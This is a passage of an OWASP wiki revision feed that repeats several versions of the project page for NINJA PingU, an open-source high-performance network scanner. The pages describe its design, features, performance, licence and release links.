| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Releases/Current&amp;diff=165945</id>
		<title>Projects/OWASP NINJA PingU Project/Releases/Current</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Releases/Current&amp;diff=165945"/>
				<updated>2014-01-15T20:32:15Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template: &amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Release About&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
| project_name = OWASP NINJA PingU&lt;br /&gt;
| project_home_page = http://owasp.github.io/NINJA-PingU/&lt;br /&gt;
| release_name = OWASP NINJA PingU v1.0&lt;br /&gt;
| release_date = 01/15/2014&lt;br /&gt;
&lt;br /&gt;
| release_description = The v1.0 release includes the complete and functional NINJA PingU's framework with a set of plugins for services analysis and embedded devices identification. More information about those and its performance can be found [http://goo.gl/eMxfkq here].&lt;br /&gt;
&lt;br /&gt;
| release_license = GPLV3&lt;br /&gt;
| release_download_link = https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz&lt;br /&gt;
&lt;br /&gt;
| leader_name1 = Guifre Ruiz&lt;br /&gt;
| leader_email1 = guifre.ruiz@owasp.org&lt;br /&gt;
| leader_username1 = guifre&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
| release_notes = &lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165850</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165850"/>
				<updated>2014-01-15T11:32:50Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165847</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165847"/>
				<updated>2014-01-15T08:28:16Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165846</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165846"/>
				<updated>2014-01-15T08:27:57Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
. &lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
